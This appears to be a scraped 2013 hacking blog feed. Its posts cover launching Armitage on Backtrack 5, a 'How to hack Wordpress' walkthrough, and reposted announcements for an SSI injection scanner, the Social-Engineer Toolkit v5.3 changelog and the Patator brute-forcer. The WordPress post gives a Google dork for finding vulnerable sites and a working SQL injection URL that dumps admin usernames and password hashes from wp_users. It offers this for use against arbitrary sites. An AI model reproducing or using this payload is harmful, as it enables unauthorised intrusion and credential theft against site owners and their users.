<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzU10pM2Qxp3E36lOYfpMZbEz2d_EF-9sgIH8xM6POg422UHhOtcPg9cI5z5RDbTjkhJUPXeEr5Cs7fnm5TmU4Sh9zhhPEZQan9cmRRhJe_wct_IDbSGuzK8gZZjICXfcemTFjN9I-233P/s1600/after+root.PNG" imageanchor="1" style="border: 0px; color: #102c4a; margin: 0px 1em; outline: none; padding: 0px; text-decoration: none;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzU10pM2Qxp3E36lOYfpMZbEz2d_EF-9sgIH8xM6POg422UHhOtcPg9cI5z5RDbTjkhJUPXeEr5Cs7fnm5TmU4Sh9zhhPEZQan9cmRRhJe_wct_IDbSGuzK8gZZjICXfcemTFjN9I-233P/s400/after+root.PNG" style="-webkit-box-shadow: rgb(16, 44, 74) 0px 0px 5px; border: 0px; box-shadow: rgb(16, 44, 74) 0px 0px 5px; margin: 0px; outline: none; padding: 5px;" width="400" /></a></div>
<br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><i style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;"><br style="border: 0px; margin: 0px; outline: none; padding: 0px;" /></i><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /></div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-43270253799080785792013-09-04T22:39:00.003-07:002013-09-04T22:39:36.847-07:00How To Use Armitage In Backtrack 5- Tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="background-color: white; color: #444444; font-family: inherit; font-size: 13px; line-height: 21.109375px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMfYsjtiNzRtaF2YHVcwq04A7o64xMLoQHXFLrdlmnPdB59P4hOypeFiVwu_Q_SPNtXYAqsF8I6IULObTRefmWoh2NHmXtT7N5pcWw4Blha1syJlAIDvP8xhsHaYp84fLHyaqCphNiXc8/s1600/armitage+bt5.jpg" imageanchor="1" style="clear: left; color: #3273d3; float: left; margin-bottom: 1em; margin-right: 1em; outline: none; text-decoration: none;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMfYsjtiNzRtaF2YHVcwq04A7o64xMLoQHXFLrdlmnPdB59P4hOypeFiVwu_Q_SPNtXYAqsF8I6IULObTRefmWoh2NHmXtT7N5pcWw4Blha1syJlAIDvP8xhsHaYp84fLHyaqCphNiXc8/s200/armitage+bt5.jpg" style="border-width: 0px; margin: 0px 4px 4px 0px;" /></a><b>There is no need to introduce armitage, if you are related to the world of penetration testing so you have an idea about armitage </b></div>
<div style="background-color: white; color: #444444; font-family: inherit; font-size: 13px; line-height: 21.109375px;">
<b style="font-family: inherit;">Backtrack 5 is on fire now </b><b style="font-family: inherit;">after ins</b><b style="font-family: inherit;">tallation backtrack 5, you need to setup armitage to perform a effective pen testing, if you are using some older version of backtrack and if you are using other Linux distro like ubuntu </b></div>
<div style="background-color: white; color: #444444; font-family: inherit; font-size: 13px; line-height: 21.109375px;">
<b style="font-family: inherit;"><br /></b></div>
<div dir="ltr" style="background-color: white; color: #444444; font-family: inherit; font-size: 13px; line-height: 21.109375px;" trbidi="on">
<div face="inherit">
<b>You dont need to install armitage on backtrack5 because it is available on backtrack5, just follow the steps to run armitage on bt5.</b></div>
<div style="text-align: center;">
<b><span style="color: red;">Requirement</span></b></div>
<ul face="inherit" style="list-style-image: initial; list-style-position: initial; margin: 10px 0px 10px 20px;">
<li><b>Backtrack 5 </b></li>
<li><b>Java</b></li>
<li><b>Metasploit</b></li>
<li><b>MySQL</b></li>
</ul>
<div>
<b>All the requirement is available on backtrack5, so you need not to worry about it.</b></div>
<div>
<br /></div>
<ul style="list-style-image: initial; list-style-position: initial; margin: 10px 0px 10px 20px;">
<li><b>Open your backtrack and click on Applicatio</b><b>n --> backtrack --> Exploitation tools --> Network exploitation tools --> Metasploit framework --> Armitage</b></li>
</ul>
<br /><br /><div face="inherit">
<div face="inherit">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4uxRFFowiUpQCsEIr4w7UZ39z0ZjVQatr4c9DOtng72tFzWYLhh6lsNHXQLZz2Du-2OE9EBHlCxL9GJVWdF9GIa5LrqPhd8Sz1X2F0pY_-2JNEoOuMl4e8dkgOiVtOoe98zXYrAEqB20/s1600/bt5-armitage1.jpg" style="color: #3273d3; outline: none; text-decoration: none;"><img alt="" border="0" height="236" id="BLOGGER_PHOTO_ID_5621003597014066754" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4uxRFFowiUpQCsEIr4w7UZ39z0ZjVQatr4c9DOtng72tFzWYLhh6lsNHXQLZz2Du-2OE9EBHlCxL9GJVWdF9GIa5LrqPhd8Sz1X2F0pY_-2JNEoOuMl4e8dkgOiVtOoe98zXYrAEqB20/s400/bt5-armitage1.jpg" style="border: none; display: block; height: 236px; margin: 0px auto 10px; position: relative; text-align: center; width: 400px;" width="400" /></a><br /><div face="inherit">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl5AoN_EpMZBKKQFz3l-qnGmDaKOnZxfITtKkHq5D1T0a40VDoKf-9DoHZ5rzKpXzjQnwZlf8iP3AKJ9sAPVyVwWr2VXheT_mGMenRqZSUupIdS5V87qBlFPOpxALJiptm9ltuAPWTF7s/s1600/bt5-armitage2.jpg" style="color: #3273d3; outline: none; text-decoration: none;"><img alt="" border="0" height="196" id="BLOGGER_PHOTO_ID_5621003929913420370" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl5AoN_EpMZBKKQFz3l-qnGmDaKOnZxfITtKkHq5D1T0a40VDoKf-9DoHZ5rzKpXzjQnwZlf8iP3AKJ9sAPVyVwWr2VXheT_mGMenRqZSUupIdS5V87qBlFPOpxALJiptm9ltuAPWTF7s/s400/bt5-armitage2.jpg" style="border: none; display: block; height: 210px; margin: 0px auto 10px; position: relative; text-align: center; width: 428px;" width="400" /></a></div>
</div>
</div>
<ul style="list-style-image: initial; list-style-position: initial; margin: 10px 0px 10px 20px;">
<li><b>On the next windows click on connect to start</b><b> arm</b><b>itage, if it is your first time than it may take some time to start armitage.</b></li>
</ul>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYwTXRt3rFxQNlHB8w0appLXyERDx6_YIWme2kudmd87N7H40muSFQW9jFuaRECEgkxuDbiJL7JbyATJEDJi4N_kwx16JiljJXEe1CpTlAZPXAVQeiIomse9l0qf69aOvt_HNOK_zWZ5GS/s1600/bt5-armitage4.jpg" imageanchor="1" style="color: #3273d3; margin-left: 1em; margin-right: 1em; outline: none; text-decoration: none;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYwTXRt3rFxQNlHB8w0appLXyERDx6_YIWme2kudmd87N7H40muSFQW9jFuaRECEgkxuDbiJL7JbyATJEDJi4N_kwx16JiljJXEe1CpTlAZPXAVQeiIomse9l0qf69aOvt_HNOK_zWZ5GS/s320/bt5-armitage4.jpg" style="border-width: 0px; margin: 0px 4px 4px 0px;" width="320" /></a></div>
</div>
<ul style="list-style-image: initial; list-style-position: initial; margin: 10px 0px 10px 20px;">
<li><b>Now you will see the window of armitage, now your armitage is ready to use, if you dont know how to use it than you have to wait of or next article in which we will surely teach you how to use armitage by different variance.</b></li>
</ul>
<div>
<br /><br /><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_F7tyLBlbYpz4xNkQJFfMJCRjc7ozmNdYSmNeZafPII8oqUsTejdIHVyn62kViXRIUVP5T1LipGN1xGULnqy5EbnYLsDNzrLwPdCUasSSe-aqNxncOJ4c-8ZvcOgPGJYvDQPZ-qnomcE/s1600/bt5-armitage5.jpg" style="color: #3273d3; margin-left: 1em; margin-right: 1em; outline: none; text-decoration: none;"><img alt="" border="0" height="183" id="BLOGGER_PHOTO_ID_5621004530706965138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_F7tyLBlbYpz4xNkQJFfMJCRjc7ozmNdYSmNeZafPII8oqUsTejdIHVyn62kViXRIUVP5T1LipGN1xGULnqy5EbnYLsDNzrLwPdCUasSSe-aqNxncOJ4c-8ZvcOgPGJYvDQPZ-qnomcE/s400/bt5-armitage5.jpg" style="border: none; display: block; height: 236px; margin: 0px auto 10px; position: relative; width: 400px;" width="400" /></a></div>
</div>
</div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-23606555199129130402013-09-02T14:25:00.002-07:002013-09-02T14:25:48.158-07:00How to hack Wordpress?<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background-color: #fcfcfc; color: #141414; font-size: 14px; line-height: 28px;">The tutorial will give you an idea about wordpress hack. Wordpress can be hacked with this simple trick. This trick does not apply to all wp-sites but the rate of attack is almost 70% successfull. So lets begin the tutorial. </span><br />
<br style="background-color: #fcfcfc; color: #141414; font-size: 14px; line-height: 28px;" /><span style="background-color: #fcfcfc; color: #141414; font-size: 14px; line-height: 28px;">1. Open google and search this dork:</span><br style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px;" /><br />
<div style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px; margin: 0px; padding: 0px 0px 0px 30px;">
<div style="margin: 0px; padding: 0px 0px 0px 30px;">
<br /><div class="bbCodeBlock bbCodeQuote" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0392157) 0px 1px 6px; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-top-left-radius: 4px; border-top-right-radius: 4px; border: 1px solid rgb(222, 222, 222); box-shadow: rgba(0, 0, 0, 0.0392157) 0px 1px 6px; margin: 1em 150px 1em 0px; padding: 0px;">
<aside><blockquote class="quoteContainer" style="background-color: whitesmoke; background-position: 50% 0%; background-repeat: repeat no-repeat; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-top-left-radius: 4px; border-top-right-radius: 4px; font-size: 9pt; margin: 0px; overflow: hidden; padding: 10px; position: relative;">
<div class="quote" style="margin: 0px; max-height: 150px; overflow: hidden; padding: 0px 0px 0px 3px;">
<span style="color: lime;"><span style="color: black;">inurl:"fbconnect_action=myhome"</span></span></div>
</blockquote>
</aside></div>
</div>
</div>
<br style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px;" />
<div align="center" style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px; margin: 0px; padding: 0px;">
<ins style="border: none; display: inline-table; height: 90px; margin: 0px; padding: 0px; position: relative; text-decoration: none; visibility: visible; width: 728px;"><ins id="aswift_2_anchor" style="border: none; display: block; height: 90px; margin: 0px; padding: 0px; position: relative; text-decoration: none; visibility: visible; width: 728px;"><iframe allowtransparency="true" frameborder="0" height="90" hspace="0" id="aswift_2" marginheight="0" marginwidth="0" name="aswift_2" scrolling="no" style="left: 0px; max-width: 100%; position: absolute; top: 0px;" vspace="0" width="728"></iframe></ins></ins></div>
<br style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px;" /><span style="background-color: #fcfcfc; color: #141414; font-size: 14px; line-height: 28px;"><span style="color: black;">2. Now open any link from the search result .<br /><br />3. After opening the link just change this part of the URL</span></span><br style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px;" /><br />
<div style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px; margin: 0px; padding: 0px 0px 0px 30px;">
<br /><div class="bbCodeBlock bbCodeQuote" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0392157) 0px 1px 6px; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-top-left-radius: 4px; border-top-right-radius: 4px; border: 1px solid rgb(222, 222, 222); box-shadow: rgba(0, 0, 0, 0.0392157) 0px 1px 6px; margin: 1em 150px 1em 0px; padding: 0px;">
<aside><blockquote class="quoteContainer" style="background-color: whitesmoke; background-position: 50% 0%; background-repeat: repeat no-repeat; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-top-left-radius: 4px; border-top-right-radius: 4px; font-size: 9pt; margin: 0px; overflow: hidden; padding: 10px; position: relative;">
<div class="quote" style="margin: 0px; max-height: 150px; overflow: hidden; padding: 0px 0px 0px 3px;">
?fbconnect_action=myhome&userid=</div>
</blockquote>
</aside></div>
</div>
<span style="background-color: #fcfcfc; color: #141414; font-size: 14px; line-height: 28px;"><span style="color: black;">with this </span></span><br />
<div style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px; margin: 0px; padding: 0px 0px 0px 30px;">
<div class="bbCodeBlock bbCodeQuote" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0392157) 0px 1px 6px; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-top-left-radius: 4px; border-top-right-radius: 4px; border: 1px solid rgb(222, 222, 222); box-shadow: rgba(0, 0, 0, 0.0392157) 0px 1px 6px; margin: 1em 150px 1em 0px; padding: 0px;">
<aside><blockquote class="quoteContainer" style="background-color: whitesmoke; background-position: 50% 0%; background-repeat: repeat no-repeat; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-top-left-radius: 4px; border-top-right-radius: 4px; font-size: 9pt; margin: 0px; overflow: hidden; padding: 10px; position: relative;">
<div class="quote" style="margin: 0px; max-height: 150px; overflow: hidden; padding: 0px 0px 0px 3px;">
<span style="font-family: 'Times New Roman';"><span style="color: lime;"><span style="color: black;">?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z0mbyak,7,8,9,10,11,12+from+wp_users--</span></span></span></div>
</blockquote>
</aside></div>
</div>
<span style="background-color: #fcfcfc; color: #141414; font-size: 14px; line-height: 28px;"><span style="color: lime;"><br /></span></span><span style="background-color: #fcfcfc; color: #141414; font-size: 14px; line-height: 28px;">Hit enter and you will get a page like this </span><br style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px;" /><span style="background-color: #fcfcfc; color: #141414; font-size: 14px; line-height: 28px;"><img alt="[IMG]" class="bbCodeImage LbImage" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZ5GBFZAm1o_YPsZmPU074S35TuPqyYkG7LxK78H0RGre-MOe35IT0n3hu-psAe1DjYr_fKzWeUgdPxrmRktarHKmzTD_KtAEieSiXv2u1n4PfYAz7ArC_Nb5UvTEVy2jNQzUHyr7iaT8s/s1600/Capture.PNG" style="border: 0px; max-width: 100%;" /></span><br style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px;" /><br style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px;" /><br style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px;" /><span style="background-color: #fcfcfc; color: #141414; font-size: 14px; line-height: 28px;">Now you have admin of the page and the hash. Decrypt the hash and you will get the password....</span><br style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px;" /><br style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px;" /><span style="background-color: #fcfcfc; color: #141414; font-size: 14px; line-height: 28px;">happy hacking :joy <img alt=":psy" class="mceSmilie" src="http://xiaopan.co/forums/styles/smilies/psy.gif" style="border: 0px; margin: 0px 1px; max-width: 100%; vertical-align: text-bottom;" title="Gangnam :psy" /></span></div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-21565551443713400432013-09-02T14:20:00.003-07:002013-09-02T14:20:41.469-07:00Ssiscan - ssi injection scanner<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9gEXRIJlKvfIIFAJ1QjHjLxrOvrfKAtK8w17L5L9DK6BLInZyuiEHM2Bmzxl0BRufrcgsAqVlDRrMS41-5N06JBRXd6mIGeV6sOOe6MrpdWDhZXKQi5waigg1md3eOIFIMiwOwBrw86KM/s1600/hck.jpg" imageanchor="1" style="background-color: white; margin-left: 1em; margin-right: 1em; outline: none;"><span style="color: black;"><img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9gEXRIJlKvfIIFAJ1QjHjLxrOvrfKAtK8w17L5L9DK6BLInZyuiEHM2Bmzxl0BRufrcgsAqVlDRrMS41-5N06JBRXd6mIGeV6sOOe6MrpdWDhZXKQi5waigg1md3eOIFIMiwOwBrw86KM/s1600/hck.jpg" style="border: none; padding: 0px;" width="400" /></span></a></div>
<span style="background-color: white;"><span style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">SSI-Scan is a basic PoC tool that helps facilitate the discovery of SSI injection vulnerabilities, a fairly rare and underdocumented code injection vulnerability where Server Side Includes directives are executed without proper validation and may lead to a system compromise or complete server enumeration.</span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><span style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">At this point, SSI-Scan tests for injection by sending a POST request encapsulated with a hardcoded payload or through injecting forms specified by the user with a payload and looking for environment variable matches in the page source.</span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><span style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">SSI-Scan requires BeautifulSoup4 and mechanize.</span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><span style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">Example usage: -</span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><span style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">python ssi-scan.py -u http://example.com</span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><span style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">python ssi-scan.py -u http://example.com –form_uname username –form_passwd password</span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><span style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">For more information on SSI injection:</span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><a href="https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection" style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; outline: none;">https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection</a><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><a href="http://capec.mitre.org/data/definitions/101.html" style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; outline: none;">http://capec.mitre.org/data/definitions/101.html</a></span><br />
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white;"><br /></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white;">Source-</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<a href="http://n0where.net/ssi-scan-ssi-injection-scanner/" style="background-color: white; outline: none;"><span style="color: black;">http://n0where.net/ssi-scan-ssi-injection-scanner/</span></a></div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-40814958641707677612013-09-02T14:20:00.001-07:002013-09-02T14:20:16.773-07:00The Social-Engineer Toolkit (SET) v5.3 Released<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background-color: white;"><span style="font-family: arial, Oxygen, sans-serif; font-size: 14px; line-height: 21.6875px; text-align: justify;">TrustedSec is proud to announce the release of The Social-Engineer Toolkit (SET) v5.3 codename “NextGen Unicorn”. This release is recommended for any users that utilize the toolkit and has a number of critical bug fixes and feature enhancements. This version incorporates a number of new attack and payload delivery systems including an improved Java Applet, better bypass of newer preventative technologies, and improved PowerShell deployment techniques. This version was over two months of solid development in providing some new advanced attack vectors as well as stability and bug fixes for the new version.</span></span><br />
<div class="separator" style="clear: both; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglho2rU9tKM8M6nRxMQjZ4nheoBEzqE5cd4cEqf7XD7j6jVsMyHxEvkG0cXgfvLoNeK4jL19mmmpdaG-7ROmkU2Bsvyf5_tV8Cm2PTzO2OmWITnQNvJSkYff1kD5tA4O-ziMutrpG6l1ON/s1600/SET-update+(2).png" imageanchor="1" style="background-color: white; margin-left: 1em; margin-right: 1em; outline: none;"><span style="color: black;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglho2rU9tKM8M6nRxMQjZ4nheoBEzqE5cd4cEqf7XD7j6jVsMyHxEvkG0cXgfvLoNeK4jL19mmmpdaG-7ROmkU2Bsvyf5_tV8Cm2PTzO2OmWITnQNvJSkYff1kD5tA4O-ziMutrpG6l1ON/s1600/SET-update+(2).png" style="border: none; padding: 0px;" width="400" /></span></a></div>
<div style="font-family: arial, Oxygen, sans-serif; font-size: 14px; line-height: 21.6875px; text-align: justify;">
<span style="background-color: white;">In addition to these changes, the new version also incorporates brand new versions of Multi-Pyinjector and PyInjector which has much more stable shellcode injection into memory and AES 256 encrypted payload delivery systems.</span></div>
<div style="font-family: arial, Oxygen, sans-serif; font-size: 14px; line-height: 21.6875px; text-align: justify;">
<span style="background-color: white;">Please note, there was one major change on the functionality of SET. From now on, to run set it is recommended to type “setoolkit” instead of “se-toolkit”. This was done based on the name “SET” being the flagship for what people know. When tabbing on Linux, this wasn’t apparent, by typing “set” and tabbing, you should see the launcher. Right now, se-toolkit still works but will be removed in the next version of SET.</span></div>
<div style="font-family: arial, Oxygen, sans-serif; font-size: 14px; line-height: 21.6875px; text-align: justify;">
<span id="more-2096" style="background-color: white;"></span></div>
<div style="font-family: arial, Oxygen, sans-serif; font-size: 14px; line-height: 21.6875px; text-align: justify;">
<span style="background-color: white;">Full changelog below:</span></div>
<div style="font-family: arial, Oxygen, sans-serif; font-size: 14px; line-height: 21.6875px; text-align: justify;">
<span style="background-color: white;">~~~~~~~~~~~~~~~~<br />version 5.3<br />~~~~~~~~~~~~~~~~</span></div>
<div style="font-family: arial, Oxygen, sans-serif; font-size: 14px; line-height: 21.6875px; text-align: justify;">
<span style="background-color: white;">* Fixed an issue that would cause ipaddr to not be defined when using multi-pyinjector<br />* Changed se-toolkit for launch to setoolkit – easier to type when typing set<br />* Fixed an issue that would cause set-automate to not properly work due to old set launcher<br />* Added set EnableStageEncoding true to default on Multipyinjector<br />* Added fixed ID param name name=”" to applet tags to show up properly in Firefox, Chrome, etc.<br />* Converted payloads for shikata second stage encoding for all SET payloads<br />* Fixed a exceptions error when inside modules and control-c out of them<br />* Removed old wording in setup.py installer<br />* Added new conversion for setup.py to change se-toolkit to install with setoolkit<br />* Slimmed the teensy powershell code down significantly<br />* Modified the teensy powershell attack to support the x86 downgrade attack<br />* Slimmed down the mssql powershell attack vector significantly<br />* Slimmed down the psexec powershell attack vector significantly<br />* Updated rid_enum to the latest version within Fast-Track<br />* Realigned initial banner message when entering into SET<br />* Fixed a large bug in webjacking and tabnabbing where it would not load the index.html properly do to a os.remove on index.html instead of os.remove on site variable (index or index2.html)<br />* Removed old man left in the middle from the toolkit under multi-attack was no longer used and code removed<br />* Fixed an issue that would cause credential harvester and applet in multiattack to not properly work<br />* Fixed a bug that would cause APACHE to flag if it was run in a different directory<br />* Changed applet tag slightly to be more descriptive to coax users into clicking<br />* Fixed a backup issue when using java applet first then harvester second<br />* Fixed a large bug in multi-pyinjector that was causing the binary to not call back properly<br />* Fixed multiple other bugs with multi-pyinjector and also fixing freeze.support issues with multiprocessing<br />* Fixed a bug that would cause an IP to not assign when using pyinjector<br />* Added better stability to pyinjector regular and also virtualized the pe<br />* Fixed an issue causing linux and OSX binaries to not properly deploy<br />* Added faster load time on OSX and Linux creation of binaries when linux / osx mode added<br />* Changed how payload delivery is handled and loads faster within the applet<br />* Added better error handling if webattack email is set to on<br />* Fixed some old code from when you are in a loop<br />* Added a port options check when specifying multipyinjector and pyinjector to warn if port 80 is selected</span></div>
<span style="background-color: white;"><span style="font-family: arial, Oxygen, sans-serif; font-size: 14px; line-height: 21.6875px; text-align: justify;"><br /></span><span style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"></span></span>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: justify;">
<span style="font-family: arial, Oxygen, sans-serif;"><span style="background-color: white; font-size: 14px; line-height: 21.6875px;">Source-</span></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: justify;">
<a href="https://www.trustedsec.com/august-2013/the-social-engineer-toolkit-set-v5-3-released/" style="background-color: white; outline: none;"><span style="color: black;">https://www.trustedsec.com/august-2013/the-social-engineer-toolkit-set-v5-3-released/</span></a></div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-72408209757486363522013-09-02T14:19:00.002-07:002013-09-02T14:19:29.559-07:00Patator Brute Forcer 0.5 - multi-purpose brute-forcer<div dir="ltr" style="text-align: left;" trbidi="on">
<pre style="font-family: 'andale mono', 'lucida console', monospace; font-size: 13px; line-height: 18px; margin-bottom: 20px; margin-top: 20px; overflow: auto; padding: 0px; white-space: pre-wrap;"><code style="font-family: 'andale mono', 'lucida console', monospace; margin: 0px; padding: 0px;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.
Currently it supports the following modules:
- ftp_login : Brute-force FTP
- ssh_login : Brute-force SSH
- telnet_login : Brute-force Telnet
- smtp_login : Brute-force SMTP
- smtp_vrfy : Enumerate valid users using the SMTP 'VRFY' command
- smtp_rcpt : Enumerate valid users using the SMTP 'RCPT TO' command
- finger_lookup : Enumerate valid users using Finger
- http_fuzz : Brute-force HTTP
- pop_login : Brute-force POP3
- pop_passd : Brute-force poppassd (http://netwinsite.com/poppassd/)
- imap_login : Brute-force IMAP4
- ldap_login : Brute-force LDAP
- smb_login : Brute-force SMB
- smb_lookupsid : Brute-force SMB SID-lookup
- vmauthd_login : Brute-force VMware Authentication Daemon
- mssql_login : Brute-force MSSQL
- oracle_login : Brute-force Oracle
